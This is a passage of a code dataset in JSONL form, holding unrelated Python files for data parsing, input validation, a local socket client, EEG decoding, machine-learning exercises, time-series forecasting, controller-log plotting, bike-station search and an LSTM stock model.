\"julia_pmap\"]\nfilenames = [\"data/thread-decomposition/\" + x + \".dat\" for x in exps]\nyaxis_title = \"Latency (ns)\"\n\nbarplot_files(filenames, [\"pthreads manual\", \"OMP parallel for\", \"Julia distributed\", \"Julia pmap()\"], yaxis_title)\n\n","sub_path":"plotting_and_reporting/parallel_constructs.py","file_name":"parallel_constructs.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"46948560","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 19 21:29:25 2017\n\n@author: Jordan\n\nParse Data from ART System .drf files, save to file\nInput is a regular ART .drf file, output is a csv file.\n\"\"\"\n\nimport re\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport glob, os\n\n#%% Regular expression queries for validating intact ART data\n#filePath = '../data/body.drf'\n#filePath = '../data/elbowFlex1.drf'\n#fileName = re.findall('.*/(.+).drf',filePath)[0]\ndataLabelSearch = '([a-zA-Z0-9]+) .+' # RegEx Search string for the alphanum labels\ndataLabels=['fr','ts','6dcal','6d','6di','6df2','glcal','gl'] # Search string for alphanum labels\nregexFloat = '[a-z0-9]+ ([0-9.]+)' # Regex for the float values\nregexFloatInt = '-*[0-9]+\\.*[0-9]*' # Float or int values, postive or negative\nregexFloatInt2 = '-?[0-9]+\\.?[0-9]*' # Float or int values, postive or negative\nregexBodyObjects = '\\[.+?\\]\\[.+?\\]\\[.+?\\]' # Grab each body object\nregexNumObjects = '6di ([0-9]) ' # Number of objects tracked\nqueryDevice = '(?:(-?[0-9]+) ?)' # Query for integer Omron / IMU Device data\nquery6d = '((\\[(?:(?:-??[0-9]+\\.??[0-9]*) ??){2}\\])(\\[(?:(?:-??[0-9]+\\.??[0-9]*) ??){6}\\])(\\[(?:(?:-??[0-9]+\\.??[0-9]*) ??){9}\\]) ??)' # Grabs\nquery6di = '((\\[(?:(?:-??[0-9]+\\.??[0-9]*) ??){3}\\])(\\[(?:(?:-??[0-9]+\\.??[0-9]*) ??){3}\\])(\\[(?:(?:-??[0-9]+\\.??[0-9]*) ??){9}\\]) ??)' # 6di data\nqueryLineData = '\\[.*\\]' # All data in a line, starting and ending with []\nhandTrackerPointCt = 70 # Number of elements expected for hand tracker data\n\nprotoDataMinLength = 100 # 
Min Character length of proto data. Helps to reject the \"connected\" starter messages\nprotoNumEl = 29 # Num elements in proto line\nprotoMinEl = 26\n\n#%% Functions\ndef BodyPosition(query,string):\n # Search for position data and return as a list of float values\n BodyValues = re.findall(query,string) # Grab numbers\n BodyValues = [float(i) for i in BodyValues] # Convert to float\n position = BodyValues[3:6] # Grab position values\n return position\n\ndef BodyRotation(query,string):\n # Search for position data and return as a list of float values\n BodyValues = re.findall(query,string) # Grab numbers\n BodyValues = [float(i) for i in BodyValues] # Convert to float\n position = BodyValues[6:] # Grab position values\n return position\n#\n#def HandData(query,string):\n#\t# Search for hand data nad return list of float values\n\t\t\t\t\ndef parse(filePath): # Parse files\n\t# Parse ART and Proto data and return in arrays\n\tfile = open(filePath,'r') # Open file\n\t# Data Arrays\n\tdataLabel = []\n\tframe = []\n\ttime = []\n\tsixdcal = []\n\tNumObjects = -1\n\tpositions = []\n\trotations = []\n\thandTracker = []\n\tdeviceDatas = [] # Data from Omron / IMU Device\n\tfor line in file: # Process one line at a time\n\t\t\n\t\tif re.findall(dataLabelSearch,line):\n\t\t\tdataType = re.findall(dataLabelSearch,line)[0] # This is the data type label\n\t\t\tif dataType == dataLabels[0]: # frame number\n\t\t\t\taframe = re.findall(regexFloat,line)[0]\n\t\t\t\tframe.append(int(aframe))\n\t\t\telif dataType == dataLabels[1]: # time value\n\t\t\t\tatime = re.findall(regexFloat,line)[0]\n\t\t\t\ttime.append(float(atime))\n\t\t\telif dataType == dataLabels[2]: # 6d calibration data (number of tracked bodies)\n\t\t\t\tasixdcal = re.findall(regexFloat,line)[0]\n\t\t\t\tsixdcal.append(int(asixdcal))\t\n\t\t\telif dataType == dataLabels[3]: # 6d tracker data\n#\t\t\t\tprint('6d data instead of 6d inertial detected')\n\t\t\t\tpass\n\t\t\telif dataType == dataLabels[4]: # 6d inertial tracker data\n\t\t\t\tif NumObjects == -1: # Check for the number of tracked objects if it isn't known yet\n\t\t\t\t\tNumObjects = int(re.findall(regexNumObjects,line)[0]) # Find number of objects that were being tracked\t\t\t\t\n\t\t\t\t\tfor i in range(NumObjects): # Pre-allocate a list for positions, rotations of each body\n\t\t\t\t\t\tpositions.append([])\n\t\t\t\t\t\trotations.append([])\n\t\t\t\t\t\t\n\t\t\t\tBodyObjects = re.findall(regexBodyObjects,line) # Grab each of the tracked bodies\n\t\t\t\tfor i,body in enumerate(BodyObjects):\n\t\t\t\t\tposition = BodyPosition(regexFloatInt,body) # Grab the position\n\t\t\t\t\tpositions[i].append(position) # Append to appropriate list\t\n\t\t\t\t\trotation = BodyRotation(regexFloatInt,body) # Grab rotation data\n\t\t\t\t\trotations[i].append(rotation) # Append to appropriate list\t\n\t\t\telif dataType == dataLabels[7] : # finger track 'gl' data\n\t\t\t\tif int(re.findall('gl ([0-9]).*',line)[0]) !=0: # Ensure that the line isn't actually empty\n\t\t\t\t\tlineData = re.findall(queryLineData,line)\n\t\t\t\t\thandValues = re.findall(regexFloatInt2,lineData[0])\n\t\t\t\t\thandValues = [float(i) for i in handValues]\n\t\t\t\t\thandTracker.append(handValues)\n\t\t\t\telse:\n\t\t\t\t\thandTracker.append([0 for i in range(handTrackerPointCt)])\n\t\t\telse: # This is likely a Omron IMU line\n\t\t\t\tif len(line) > protoDataMinLength: # This is probably a prototype data line if length is sufficient\n\t\t\t\t\t# Use RegEx to grab all elements\t\t\t\t\t\n\t\t\t\t\tdeviceData = 
re.findall(regexFloatInt,line)\n\t\t\t\t\t# If length is sufficient, write into list. Cast to int\n\t\t\t\t\tif len(deviceData) >= protoMinEl:\n\t\t\t\t\t\tdeviceData = [float(i) for i in deviceData]\n\t\t\t\t\t\tdeviceDatas.append(deviceData)\n\t\t\t\t\telse:\n\t\t\t\t\t\tdeviceDatas.append([0 for i in range(26)]) # Put an empty line in otherwise\n\t\t\t\telif len(line) > 40:\n\t\t\t\t\tdeviceDatas.append([0 for i in range(26)]) # Put an empty line in otherwise\n\treturn frame,time,sixdcal, positions, rotations, deviceDatas, handTracker\n\ndef joinProtoART(positions,rotations,deviceDatas,time,handTracker,fileName):\n\t# Unite ART and proto data into array for saving\n\t# Built to be extensible to the number of tracker objects present\n\t# Make a list to hold all available data in\n\tdata = []\n\t# Check for time values from ART System\n\tif time:\n\t\tdata.append(time)\n\t# Check for IR Device data\n\tif deviceDatas:\n\t\tdata.append(deviceDatas)\n\t# Check for position data from ART System\n\tif positions:\n\t\t[data.append(i) for i in positions]\n\t# Check for rotation data from ART System\n\tif rotations:\n\t\t[data.append(i) for i in rotations]\n\t# Check for hand tracker data from ART System\n\tif handTracker:\n\t\tdata.append(handTracker)\n\t\n\t# Check that data arrays are equal length\n\tlengths = []\n\tfor i in data:\n\t\tlengths.append(len(i))\n\t# If lengths array has length 1, we likely have Omron Data\n\tif len(lengths) == 1:\n\t\tdataArray = np.array(data[0])\n\t# Otherwise, we should ART and proto data\n\telse:\n\t\n\t\tif lengths[1:] == lengths[:-1]:\n\t\t\tprint('All arrays are equal length')\n\t\t\tlengthsEqual = True\n\t\t\tnewData = data\n\t\telse:\n\t\t\tprint('Arrays are not equal in length')\n\t\t\tminLength = min(lengths)\n\t\t\tnewData = []\n\t\t\tfor i in data:\n\t\t\t\tnewData.append(i[:minLength])\n\t\t\tlengthsEqual = True\n\t\t\n\t\tif lengthsEqual:\n\t\t\tdataArray = np.array(newData[0]).reshape((len(newData[0]),1))# Put the time row in first\n\t\t\tfor i in range(1,len(newData)):\n\t#\t\t\tprint(np.array(newData[i]).shape)\n\t\t\t\tdataArray = np.hstack((dataArray,np.array(newData[i])))\n\t\t\t\t\t\n\tnp.savetxt(fileName+'.csv',dataArray, delimiter=',')\n\treturn dataArray\n\ndef parseSave(afile):\n\tfilePath = afile\n\tfileName = os.path.basename(afile)[:-4]\n\tframe,time,numBodies, positions, rotations, deviceDatas,handTracker = parse(filePath)\n\tdataArray = joinProtoART(positions,rotations,deviceDatas,time,handTracker,fileName)\n\tnp.savetxt(fileName+'.csv',dataArray, delimiter=',')\n\treturn\n","sub_path":"parseData.py","file_name":"parseData.py","file_ext":"py","file_size_in_byte":7188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"65705109","text":"\nfrom abc import ABCMeta, abstractmethod\nimport datetime\n\n# abstract factory\n\n\nclass AbstractChecker(metaclass=ABCMeta):\n \"\"\"AbstractChecker\"\"\"\n @abstractmethod\n def check(self, data):\n pass\n# singeton class inherit from AbstractChecker\n\n\nclass EmployeeIdChecker(object):\n\n class __EmployeeIdChecker(AbstractChecker):\n\n def check(self, input_data):\n result = False\n if input_data.__len__() > 0:\n num_ascii = ord(input_data[0])\n if num_ascii > 64 and num_ascii < 91:\n int_digit = input_data[1::]\n if int_digit.isdigit() and int_digit.__len__() == 3:\n result = True\n else:\n result = False\n else:\n result = False\n return result\n instance = None\n\n def __init__(self):\n if not EmployeeIdChecker.instance:\n 
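# Created once on first use; every later construction reuses the shared inner checker.\n            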
EmployeeIdChecker.instance = EmployeeIdChecker.__EmployeeIdChecker()\n\n def __getattr__(self, name):\n return getattr(self.instance, name)\n\n\nclass GenderChecker(object):\n\n class __GenderChecker(AbstractChecker):\n\n def check(self, input_data):\n result = False\n if input_data == 'M' or input_data == 'F':\n result = True\n else:\n result = False\n return result\n instance = None\n\n def __init__(self):\n if not GenderChecker.instance:\n GenderChecker.instance = GenderChecker.__GenderChecker()\n\n def __getattr__(self, name):\n return getattr(self.instance, name)\n\n\nclass AgeChecker(object):\n\n class __AgeChecker(AbstractChecker):\n\n def check(self, input_data):\n result = False\n if input_data.isdigit() and input_data.__len__() == 2:\n result = True\n else:\n result = False\n return result\n instance = None\n\n def __init__(self):\n if not AgeChecker.instance:\n AgeChecker.instance = AgeChecker.__AgeChecker()\n\n def __getattr__(self, name):\n return getattr(self.instance, name)\n\n\nclass SalesChecker(object):\n\n class __SalesChecker(AbstractChecker):\n\n def check(self, input_data):\n result = False\n if input_data.isdigit() and input_data.__len__() == 3:\n result = True\n else:\n result = False\n return result\n instance = None\n\n def __init__(self):\n if not SalesChecker.instance:\n SalesChecker.instance = SalesChecker.__SalesChecker()\n\n def __getattr__(self, name):\n return getattr(self.instance, name)\n\n\nclass BMIChecker(object):\n\n class __BMIChecker(AbstractChecker):\n\n def check(self, input_data):\n result = False\n options = ['Normal', 'Overweight', 'Obesity', 'Underweight']\n if input_data in options:\n result = True\n else:\n result = False\n return result\n instance = None\n\n def __init__(self):\n if not BMIChecker.instance:\n BMIChecker.instance = BMIChecker.__BMIChecker()\n\n def __getattr__(self, name):\n return getattr(self.instance, name)\n\n\nclass SalaryChecker(object):\n\n class __SalaryChecker(AbstractChecker):\n\n def check(self, input_data):\n result = False\n if input_data.isdigit() and input_data.__len__() >= 2 and input_data.__len__() <= 3:\n result = True\n else:\n result = False\n return result\n instance = None\n\n def __init__(self):\n if not SalaryChecker.instance:\n SalaryChecker.instance = SalaryChecker.__SalaryChecker()\n\n def __getattr__(self, name):\n return getattr(self.instance, name)\n\n\nclass BirthdayChecker(object):\n\n class __BirthdayChecker(AbstractChecker):\n\n def check(self, input_data):\n result = False\n try:\n if(datetime.datetime.strptime(input_data, '%d-%m-%Y')):\n date = datetime.datetime.strptime(input_data, '%d-%m-%Y')\n if(date.year > datetime.datetime.now().year):\n result = False\n else:\n result = True\n else:\n result = False\n return result\n except ValueError:\n return False\n instance = None\n\n def __init__(self):\n if not BirthdayChecker.instance:\n BirthdayChecker.instance = BirthdayChecker.__BirthdayChecker()\n\n def __getattr__(self, name):\n return getattr(self.instance, name)\n\n\nclass Validator(object):\n\n \"\"\"docstring for ClassName\"\"\"\n # def __init__(self):\n\n def is_valid_employee_id(self, input_data):\n checker = EmployeeIdChecker()\n return checker.check(input_data)\n\n def is_valid_gender(self, input_data):\n checker = GenderChecker()\n return checker.check(input_data)\n\n def is_valid_age(self, input_data):\n checker = AgeChecker()\n return checker.check(input_data)\n\n def is_valid_sales(self, input_data):\n checker = SalesChecker()\n return checker.check(input_data)\n\n def 
is_valid_BMI(self, input_data):\n checker = BMIChecker()\n return checker.check(input_data)\n\n def is_valid_salary(self, input_data):\n checker = SalaryChecker()\n return checker.check(input_data)\n\n def is_valid_birthday(self, input_data):\n checker = BirthdayChecker()\n return checker.check(input_data)\n\n def is_load_data(self, input_data):\n result = 0\n data = input_data.split(',')\n if(data.__len__() == 7):\n if(self.is_valid_employee_id(data[0])):\n result += 1\n if(self.is_valid_gender(data[1])):\n result += 1\n if(self.is_valid_age(data[2])):\n result += 1\n if(self.is_valid_sales(data[3])):\n result += 1\n if(self.is_valid_BMI(data[4])):\n result += 1\n if(self.is_valid_salary(data[5])):\n result += 1\n if(self.is_valid_birthday(data[6])):\n result += 1\n if(result == 7):\n return True\n else:\n return False\n","sub_path":"bad_smell_duplication/code/new_code/validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":6368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"387226454","text":"import socket\nimport struct\nimport json\nimport os\n\nclass Socket:\n\tdef __init__(self, _globals):\n\t\tself.globals = _globals\n\t\tself.connected = False\n\t\tself.sock = None\n\n\t\tself.address = (\"127.0.0.1\", 5654)\n\n\tdef close(self):\n\t\ttry:\n\t\t\tself.sock.close()\n\t\texcept:\n\t\t\tpass\n\t\tself.sock = None\n\t\tself.connected = False\n\n\tdef connect(self):\n\t\tif self.connected:\n\t\t\treturn True\n\n\t\ttry:\n\t\t\tself.sock = socket.socket()\n\t\t\tself.sock.connect(self.address)\n\t\t\tself.connected = True\n\n\t\texcept:\n\t\t\tself.close()\n\t\t\treturn False\n\n\t\tsent = self.send({\n\t\t\t\"type\": \"handshake\",\n\t\t\t\"token\": os.getenv(\"FSOL_BOT_SOCKET_TOKEN\")\n\t\t})\n\t\tif sent:\n\t\t\trecv = self.recv()\n\n\t\t\tif recv[0] and recv[1][\"success\"]:\n\t\t\t\treturn True\n\n\t\tself.close()\n\t\treturn False\n\n\tdef send(self, data, *, recall=True):\n\t\tif self.connected:\n\t\t\ttry:\n\t\t\t\tpacket = json.dumps(data).encode()\n\t\t\t\tself.sock.send(struct.pack(\"!L\", len(packet)) + packet)\n\t\t\t\treturn True\n\n\t\t\texcept:\n\t\t\t\tself.close()\n\t\t\t\tif recall and self.connect():\n\t\t\t\t\treturn self.send(data, recall=False)\n\t\t\t\treturn False\n\t\telse:\n\t\t\tif recall and self.connect():\n\t\t\t\treturn self.send(data, recall=False)\n\t\t\treturn False\n\n\tdef recv(self, *, recall=True):\n\t\tif self.connected:\n\t\t\ttry:\n\t\t\t\tlength = struct.unpack(\"!L\", self.sock.recv(4))\n\t\t\t\tpacket = self.sock.recv(length[0])\n\n\t\t\t\treturn True, json.loads(packet)\n\n\t\t\texcept:\n\t\t\t\tself.close()\n\t\t\t\tif recall and self.connect():\n\t\t\t\t\treturn self.recv(recall=False)\n\t\t\t\treturn (False,)\n\t\telse:\n\t\t\tif recall and self.connect():\n\t\t\t\treturn self.recv(recall=False)\n\t\t\treturn (False,)\n\nclass CommunicationMiddleware:\n\tdef __init__(self, get_response):\n\t\tself.get_response = get_response\n\n\tdef __call__(self, request):\n\t\tif request.globals.socket is None:\n\t\t\trequest.globals.socket = Socket(request.globals)\n\n\t\treturn self.get_response(request)","sub_path":"middleware/communication.py","file_name":"communication.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"546672604","text":"# Author: Nicolas Legrand (legrand@cyceron.fr)\n\nimport mne\nimport multiprocessing as mp\nimport numpy as np\nimport pandas as pd\nfrom 
mne.decoding import GeneralizingEstimator\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import StandardScaler\n\nroot = \"/home/nicolas/git/DecodingMemoryIntrusions/data/\"\n\n# Subjects ID\nnames = [\n \"31NLI\",\n \"32CVI\",\n \"34LME\",\n \"35QSY\",\n \"36LSA\",\n \"37BMA\",\n \"38MAX\",\n \"39BDA\",\n \"40MMA\",\n \"41BAL\",\n \"42SPE\",\n \"44SMU\",\n \"45MJA\",\n \"46SQU\",\n \"47HMA\",\n \"50JOC\",\n \"52PFA\",\n \"53SMA\",\n \"55MNI\",\n \"56BCL\",\n \"57NCO\",\n \"58BAN\",\n \"59DIN\",\n \"60CAN\",\n]\n\nclassifier = RandomForestClassifier(\n class_weight=\"balanced\", n_estimators=50, random_state=42\n)\n\n\n# =========================================\n# %% Random label Decoding - Attention -> TNT\n# =========================================\ndef shuffled_training_labels(subject: str, n_boot: int = 200) -> np.ndarray:\n \"\"\"Run a generalized sliding decoder (GAT). Train on shuffled Attention labels.\n\n Parameters\n ----------\n subject : str\n The participant ID.\n n_boot : int\n Number of permutation.\n\n Returns\n -------\n ci : np.ndarray\n Upper and lower 95% CI for a noisy classifier.\n\n \"\"\"\n\n # Attention data\n attention_df = pd.read_csv(root + \"Attention/Behavior/\" + subject + \".txt\")\n attention = mne.read_epochs(root + \"Attention/6_decim/\" + subject + \"-epo.fif\")\n\n attention.crop(0.2, 0.5) # Only select time window of interest to save memory\n\n # TNT data\n tnt_df = pd.read_csv(root + \"TNT/Behavior/\" + subject + \".txt\")\n tnt = mne.read_epochs(root + \"TNT/6_decim/\" + subject + \"-epo.fif\")\n\n for condition in [\"No-Think\", \"Think\"]:\n\n shuffled = []\n\n for _ in range(n_boot):\n\n # Classifier\n clf = make_pipeline(StandardScaler(), classifier)\n\n time_gen = GeneralizingEstimator(clf, scoring=\"roc_auc\", n_jobs=1)\n\n X_train = attention._data[attention_df.Cond1 != \"Think\", :, :]\n y_train = attention_df.Cond1[attention_df.Cond1 != \"Think\"] == \"No-Think\"\n\n # Shuffle the trainning labels\n labels = y_train.sample(frac=1)\n\n # Fit the model\n time_gen.fit(X_train, labels)\n\n X_test = tnt._data[(tnt_df.Cond1 == condition), :, :]\n\n proba = time_gen.predict_proba(X_test)\n\n shuffled.append(proba)\n\n shuffled = np.asarray(shuffled)\n\n # 95th percentile\n ci = np.percentile(shuffled[:, :, :, :, 1], 97.5, axis=0)\n\n np.save(f\"{root}Results/Shuffled_95CI/{condition}/{subject}-high.npy\", ci)\n\n\n# %% Run\nif __name__ == \"__main__\":\n\n pool = mp.Pool(processes=24)\n pool.map(shuffled_training_labels, names)\n pool.close()\n pool.join()","sub_path":"code/8_Intrusions_Shuffled_Labels.py","file_name":"8_Intrusions_Shuffled_Labels.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"65336317","text":"\n\n#calss header\nclass _DAMN():\n\tdef __init__(self,): \n\t\tself.name = \"DAMN\"\n\t\tself.definitions = [u'to blame or strongly criticize something or someone: ', u'(especially of God) to force someone to stay in hell and be punished for ever: ', u'used to express anger with someone or something: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn 
self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_damn.py","file_name":"_damn.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"127970195","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.tree import DecisionTreeClassifier, export_graphviz\nfrom sklearn.model_selection import train_test_split\nfrom subprocess import call\nfrom sklearn import preprocessing\nmain_data = pd.read_csv(\"Dataset2.csv\")\nlabel_encoder = preprocessing.LabelEncoder()\nfor data in main_data:\n print(f\"\\n\\nHeading :- {data}\")\n print(list(main_data[data]))\n main_data[data] = label_encoder.fit_transform(main_data[data])\n print(f\"\\n\\nAfter the tranformation of {data}\")\n print(list(main_data[data]))\ncombined_features = tuple(zip(main_data[\"Outlook\"], main_data[\"Temp\"], main_data[\"Wind\"], main_data[\"Humidity\"]))\nprint(\"After combined!\")\nprint(\"Outlook, Temp, Wind, Humidity\\n\\n\")\nfor pair in combined_features:\n print(pair)\nmain_data\nx_train, x_test, y_train, y_test = train_test_split(combined_features, main_data[\"Class\"], test_size = 0.1, random_state = 54)\nprint(x_train)\nfrom sklearn import metrics\ndtc = DecisionTreeClassifier(criterion = \"entropy\")\ndtc.fit(x_train, y_train)\ny_pred = dtc.predict(x_test)\ny_pred\ny_test\nprint(\"Accuracy: \", metrics.accuracy_score(y_test, y_pred))\nprint(x_test)\nprint(\"y predicted : \", y_pred)\nprint(f\"Actual y_test {y_test}\")\ndisp = metrics.plot_confusion_matrix(dtc, x_test, y_test)\ndisp.figure_.suptitle(\"Confusion Matrix\")\nprint(f\"Confusion matrix:\\n{disp.confusion_matrix}\")\nplt.show()\nexport_graphviz(dtc, out_file='tree_entropy.dot',\n feature_names=['outlook','temperature','humidity','wind'],\n class_names=['play_no','play_yes'], \n filled=True)\ncall(['dot', '-Tpng', 'tree_entropy.dot', '-o', 'tree_entropy.png', '-Gdpi=600'])\nimport matplotlib.pyplot as plt\nplt.figure(figsize = (14, 18))\nplt.imshow(plt.imread('tree_entropy.png'))\nplt.axis('off');\nplt.show();\n\n","sub_path":"LAB4/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"22877994","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport numpy as np \nimport pandas as pd \nfrom keras import Sequential, layers, optimizers \nfrom keras.callbacks import EarlyStopping, ModelCheckpoint \nfrom keras.models import load_model \n\ndef GRUNet(input_shape=(None, 1), name='GRU_Recurrent_Network'):\n model = Sequential(name=name) \n model.add(layers.Input(shape=input_shape)) \n model.add(layers.GRU(32, return_sequences=True)) \n model.add(layers.GRU(64, return_sequences=False)) \n model.add(layers.Dense(1)) \n model.compile(loss='mse', optimizer=optimizers.Adam()) \n return model \n\ndef Convolutional(time_steps, input_shape=(None, 1), name='Convolutional_Forecaster'): \n model = Sequential(name=name) \n model.add(layers.Input(shape=input_shape)) \n model.add(layers.Conv1D(32, kernel_size=3, activation='relu', name='Conv1D')) \n model.add(layers.MaxPool1D(2, padding='same', name='MaxPool')) \n model.add(layers.Dense(time_steps, activation='sigmoid', name='Dense')) \n model.add(layers.TimeDistributed(layers.Dense(1), name='FC')) \n model.compile(optimizer=optimizers.Adam(), loss='mse') \n return model \n\ndef fit(model, x, y, path=None, batch_size=32, epochs=1000, verbose=1, shuffle=True, \n patience=25, 
val_split=0.1):\n es = EarlyStopping(monitor='val_loss', patience=patience, restore_best_weights=True) \n if path is not None: \n base_path = 'dspML/models/sequence/fitted/' \n mcp = ModelCheckpoint(base_path+path, monitor='val_loss', save_best_only=True) \n cb = [es, mcp] \n else: \n cb = [es] \n hist = model.fit(x, y, batch_size=batch_size, epochs=epochs, verbose=verbose, \n callbacks=cb, validation_split=val_split, shuffle=shuffle) \n return hist \n\ndef predict_forecast(model, train, steps): \n forecast = [] \n n = train.shape[1]\n train = np.squeeze(train[-1]) \n for i in range(steps): \n x = np.expand_dims(train[-n:], axis=(0, 2)) \n pred = model.predict(x) \n forecast.append(pred[0][0]) \n train = np.append(train, pred[0][0]) \n return pd.Series(forecast) \n\ndef load_humidity(recurrent=True): \n if recurrent: \n path = 'dspML/models/sequence/fitted/GRU_humidity.h5' \n else: \n path = 'dspML/models/sequence/fitted/cnn_humidity.h5' \n return load_model(path) \n\ndef load_wind_speed(recurrent=True): \n if recurrent: \n path = 'dspML/models/sequence/fitted/GRU_wind_speed.h5' \n else: \n path = 'dspML/models/sequence/fitted/cnn_wind_speed.h5' \n return load_model(path) \n\n","sub_path":"dspML/models/sequence/nnetfc.py","file_name":"nnetfc.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"258454753","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndata_label = input(\"data:\")\nnbr_of_plots = data_label.split(\" \")\nprint(nbr_of_plots)\nfile_names = []\nts = 1/200\nfor data_file in nbr_of_plots:\n file_names.append(f\"controller_{data_file}.log\")\n\n\nfont = {'family': 'serif',\n 'color': 'darkred',\n 'weight': 'normal',\n 'size': 16,\n }\n\ndata_labels = {\n 'imu_data': ['roll angle', 'pitch angle', 'yaw angle',\n 'roll rate', 'pitch rate', 'yaw rate'],\n 'motor': ['v1', 'v2', 'v3', 'v4'],\n 'errors': ['roll angle error', 'pitch angle error',\n 'roll rate error', 'pitch rate error', 'yaw rate error'],\n 'PID': ['k roll angle', 'k pitch angle',\n 'roll rate pid', 'pitch rate pid', 'yaw rate pid','Integral r','Integral p'],\n 'references': ['roll rate ref', 'pitch rate ref', 'yaw rate ref'],\n }\n\n# Open file_name safely and store data as a matrix\nfile_nbr = 0\nfor file_name in file_names:\n with open(file_name) as file:\n data = np.loadtxt(file, delimiter=' ')\n length = data.shape[0]\n time = np.transpose(ts*np.arange(0, length))\n counter = 0\n loop_length = int(data.shape[1])\n print(loop_length)\n for i in range(loop_length):\n plt.figure()\n plt.plot(time, data[:,counter],'b')\n plt.title(data_labels[nbr_of_plots[file_nbr]][counter], fontdict=font)\n counter +=1\n\n file_nbr +=1\n\n# This should be changed\n\n\n\n#print(time)\n#print(data)\n\n\n\n#print(loop_length)\n# labels = ['u1 v1','u2 v2',\n# 'u3 v3','u4 v4',\n# 'pitch roll', 'Ppitch Proll',\n# 'I_a_p I_a_r', 'K-del rate loop'\n# ]\n\n\n\n# plt.plot(time, data[:,counter],'orange')\n# counter+=1\n \n\nplt.show()\n\n\n\n\n","sub_path":"tools/controller_plot.py","file_name":"controller_plot.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"175430537","text":"from math import sin, cos, sqrt, atan2, radians\nimport requests\nimport json\n\nfrom captcha.fields import CaptchaField\nfrom django.forms import forms\n\n\ndef search(mylat, mylng, dist, sbi, bemp):\n url = 
'https://data.tycg.gov.tw/api/v1/rest/datastore/a1b4714b-3b75-4ff8-a8f2-cc377e4eaa0f?format=json'\n r = requests.get(url)\n root_object = json.loads(r.text)\n result_object = root_object['result']\n records_array = result_object['records']\n dict = {}\n for record in records_array:\n lat = float(record['lat'])\n lng = float(record['lng'])\n m = distance(mylat, mylng, lat, lng)\n t = '%.1f' % (m / (3000/60))\n if int(record['sbi']) >= sbi and int(record['bemp']) >= bemp and m <= dist:\n record['m'] = m//1\n record['t'] = t\n # 格式化時間 ex:20190810100326 變成 2019/08/10 10:03:26\n mday = record['mday']\n record['mday'] = mday[0:4] + '/' + mday[4:6] + '/' + mday[6:8] + \" \" + \\\n mday[8:10] + ':' + mday[10:12] + ':' + mday[12:]\n dict.update({record['sna']: record})\n\n return dict\n\n\ndef distance(point_1_lat, point_1_lon, point_2_lat, point_2_lon):\n # approximate radius of earth in km\n R = 6373.0\n lat1 = radians(float(point_1_lat))\n lon1 = radians(float(point_1_lon))\n lat2 = radians(float(point_2_lat))\n lon2 = radians(float(point_2_lon))\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2)**2 + cos(lat1) * cos(lat2) * sin(dlon / 2)**2\n c = 2 * atan2(sqrt(a), sqrt(1 - a))\n distance = R * c * 1000 # m 公尺\n return distance\n\n\n# 驗證碼類別\nclass CaptchaCheck(forms.Form):\n captcha = CaptchaField()\n","sub_path":"Django0716/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"83704967","text":"import tensorflow as tf\r\nimport numpy as np\r\nimport pandas as pd\r\nimport Data_Processor\r\n\r\nclass LSTM_net():\r\n def __init__(self,sess,stock_count,\r\n lstm_size,\r\n num_layers,\r\n num_steps,\r\n input_size,\r\n embed_size,\r\n train_ratio,\r\n logs_dir='',\r\n plots_dir=''):\r\n self.sess = sess\r\n self.stock_count = stock_count\r\n self.lstm_size = lstm_size\r\n self.num_layers = num_layers\r\n self.num_steps = num_steps\r\n self.input_size = input_size\r\n self.embed_size = embed_size or -1\r\n self.logs_dir = logs_dir\r\n self.plots_dir = plots_dir\r\n self.train_ratio=train_ratio\r\n self.graph()\r\n def graph(self):\r\n '''\r\n 构建数据流图\r\n '''\r\n '''定义需要用到的占位符'''\r\n self.learning_rate = tf.placeholder(tf.float32,None,name='LearningRate')\r\n self.keep_prob = tf.placeholder(tf.float32,None,name='KeepProb')\r\n self.symbols_x = tf.placeholder(tf.int32,[None,self.num_steps],name='stock_labels_x')\r\n self.inputs = tf.placeholder(tf.float32,[None,self.num_steps,2],name='inputs')\r\n # 2 is for the change and vol,是因为有涨跌率和交易量两组数据\r\n self.targets = tf.placeholder(tf.float32,[None,1],name='targets')\r\n\r\n '''Embedding 层,用于将每只股票用embed_size大小的向量表示'''\r\n self.embed_matrix=tf.Variable(tf.random_uniform([self.stock_count,self.embed_size],minval=-0.2,maxval=0.2),name='embed_matrix')\r\n stock_label_embeds_x = tf.nn.embedding_lookup(self.embed_matrix, self.symbols_x)\r\n\r\n '''将输入和股票的Embed_size向量表示组合起来'''\r\n self.inputs_with_embeds = 